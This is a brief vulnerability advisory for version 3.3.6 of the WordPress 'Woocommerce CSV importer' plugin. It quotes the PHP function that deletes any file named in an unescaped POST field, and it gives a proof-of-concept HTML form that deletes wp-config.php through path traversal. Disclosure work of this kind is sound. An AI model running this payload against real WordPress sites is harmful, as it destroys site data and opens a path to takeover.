Details
- Name : Woocommerce CSV importer
- Version : 3.3.6
- Homepage : https://wordpress.org/plugins/woocommerce-csvimport/
Type
- Arbitrary File Deletion
- Remote Code Execution - RCE
Description
- Type user access: any user registered.
- $_POST['filename'] is not escaped.
Code
File: wp-content/plugins/woocommerce-csvimport/export/include/classes/woocsvExport.php
Line:64
public function delete_export_file() {
if ( isset( $_POST['filename'] ) ) {
@unlink( $_POST['filename'] );
}
wp_die( 0 );
}
Proof Concept
https://www.youtube.com/watch?v=By7kT7UbHVk
1 – Log in with any user.
2 - Execute form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=delete_export_file">
<input type="text" name="filename" value="../wp-config.php">
<input type="submit">
</form>
Results
wp-config deleted and restart the all system.
Note
Solution
Timeline
- Date Discovery : 11/23/2017
- Date Vendor Contact : 12/29/2017
- Date Publish :
- Date Resolution :